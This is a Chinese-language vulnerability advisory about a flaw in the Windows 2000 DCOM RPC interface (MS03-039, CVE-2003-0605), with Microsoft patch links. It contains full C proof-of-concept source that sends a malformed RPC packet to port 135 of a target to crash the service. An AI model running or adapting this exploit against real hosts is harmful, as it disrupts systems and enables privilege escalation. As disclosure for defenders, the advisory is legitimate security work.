安全研究
安全漏洞
Microsoft Windows 2000 DCOM RPC接口拒绝服务及权限提升漏洞(MS03-039)
发布日期:2003-07-22
更新日期:2003-07-22
受影响系统:
Microsoft Windows 2000SP4描述:
Microsoft Windows 2000SP3
Microsoft Windows 2000SP2
Microsoft Windows 2000SP1
Microsoft Windows 2000
CVE(CAN) ID: CVE-2003-0605
Remote Procedure Call (RPC)是Windows操作系统使用的一种远程过程调用协议,RPC提供进程间交互通信机制,允许在某台计算机上运行程序无缝的在远程系统上执行代码。协议本身源自OSF RPC协议,但增加了Microsoft特定的扩展。
MS RPC在处理畸形消息时存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击,在RPC服务崩溃后,可用来权限提升攻击。
攻击者发送畸形消息给DCOM __RemoteGetClassObject接口,RPC服务就会崩溃,所有依靠RPC服务的应用程序和服务就会变的不正常。
如果攻击者拥有合法帐户,在RPC服务崩溃后他还可以劫持管道和135端口进行权限提升攻击。
<*来源:benjurry (benjurry@263.net)
Flashsky (flashsky@xfocus.org)
链接:http://archives.neohapsis.com/archives/bugtraq/2003-07/0255.html
http://www.microsoft.com/technet/security/bulletin/MS03-039.asp
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
void main(int argc,char ** argv)
{
WSADATA WSAData;
int i;
SOCKET sock;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
printf("Code by FlashSky,Flashskyxfocus.org,benjurry,benjurryxfocus.org\n");
printf("Welcome to http://www.xfocus.net\n");
if(argc<2)
{
printf("useage:%s target\n",argv[0]);
exit(1);
}
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}
建议:
临时解决方法:
Microsoft已经为此发布了一个安全公告(MS03-039)以及相应补丁:
MS03-039:Buffer Overrun In RPCSS Service Could Allow Code Execution(824146)
链接:http://www.microsoft.com/technet/security/bulletin/MS03-039.asp
补丁下载:
Windows NT Workstation 4.0:
http://www.microsoft.com/downloads/details.aspx?FamilyId=7EABAD74-9CA9-48F4-8DB5-CF8C188879DA&displaylang=zh-cn
Windows NT Server 4.0:
http://www.microsoft.com/downloads/details.aspx?FamilyId=71B6135C-F957-4702-B376-2DACCE773DC0&displaylang=zh-cn
Windows NT Server 4.0, Terminal Server Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=677229F8-FBBF-4FF4-A2E9-506D17BB883F
Windows 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=F4F66D56-E7CE-44C3-8B94-817EA8485DD1&displaylang=zh-cn
Windows XP:
http://www.microsoft.com/downloads/details.aspx?FamilyId=5FA055AE-A1BA-4D4A-B424-95D32CFC8CBA&displaylang=zh-cn
Windows XP 64 bit Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=50E4FB51-4E15-4A34-9DC3-7053EC206D65
Windows XP 64 bit Edition Version 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=80AB25B3-E387-441F-9B6D-84106F66059B
Windows Server 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=51184D09-4F7E-4F7B-87A4-C208E9BA4787&displaylang=zh-cn
Windows Server 2003 64 bit Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=80AB25B3-E387-441F-9B6D-84106F66059B
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS03-039)以及相应补丁:
MS03-039:Buffer Overrun In RPCSS Service Could Allow Code Execution(824146)
链接:http://www.microsoft.com/technet/security/bulletin/MS03-039.asp
补丁下载:
Windows NT Workstation 4.0:
http://www.microsoft.com/downloads/details.aspx?FamilyId=7EABAD74-9CA9-48F4-8DB5-CF8C188879DA&displaylang=zh-cn
Windows NT Server 4.0:
http://www.microsoft.com/downloads/details.aspx?FamilyId=71B6135C-F957-4702-B376-2DACCE773DC0&displaylang=zh-cn
Windows NT Server 4.0, Terminal Server Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=677229F8-FBBF-4FF4-A2E9-506D17BB883F
Windows 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=F4F66D56-E7CE-44C3-8B94-817EA8485DD1&displaylang=zh-cn
Windows XP:
http://www.microsoft.com/downloads/details.aspx?FamilyId=5FA055AE-A1BA-4D4A-B424-95D32CFC8CBA&displaylang=zh-cn
Windows XP 64 bit Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=50E4FB51-4E15-4A34-9DC3-7053EC206D65
Windows XP 64 bit Edition Version 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=80AB25B3-E387-441F-9B6D-84106F66059B
Windows Server 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=51184D09-4F7E-4F7B-87A4-C208E9BA4787&displaylang=zh-cn
Windows Server 2003 64 bit Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=80AB25B3-E387-441F-9B6D-84106F66059B
对于Windows 2000用户,我们建议您安装完Windows 2000 SP4之后再安装上述补丁:
http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/download.asp
对于Windows NT 4.0用户,我们建议您安装完SP6a之后再安装上述补丁:
http://www.microsoft.com/NTServer/nts/downloads/recommended/SP6/allsp6.asp
浏览次数:8694
严重程度:45(网友投票)
绿盟科技给您安全的保障